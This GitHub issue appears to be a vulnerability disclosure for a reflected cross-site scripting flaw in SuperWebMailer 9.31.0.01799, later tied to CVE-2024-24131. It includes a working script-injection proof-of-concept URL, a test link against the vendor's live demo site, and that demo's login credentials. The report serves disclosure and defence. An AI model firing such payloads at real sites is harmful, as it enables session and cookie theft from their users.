Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

SuperWebMailer 9.31.0.01799 has a reflective XSS vulnerability #14

Open
Hebing123 opened this issue Jan 12, 2024 · 1 comment
Open

SuperWebMailer 9.31.0.01799 has a reflective XSS vulnerability #14

Hebing123 opened this issue Jan 12, 2024 · 1 comment

Comments

@Hebing123
Copy link
Owner

Hebing123 commented Jan 12, 2024

Summary

SuperWebMailer 9.31.0.01799 has a reflective cross-site vulnerability.

Details

SuperWebMailer in version 9.31.0.01799 has a reflection cross-site attack vulnerability caused by api.php directly referencing urls without filtering.

Proof of Concept (POC)

http://ip:port/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E
Test case
https://newsletter-software-php-script.superwebmailer.de/api/api.php/%3Cscript%3Ealert(1)%3C/script%3E
image
Zugangsdaten zur Anmeldung
Benutzername: demo
Kennwort: demo

Impact

If a user or administrator accesses the malicious url, the cookie may be obtained by an attacker.

@Hebing123
Copy link
Owner Author

This is the vulnerability exploitation reference for CVE-2024-24131

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant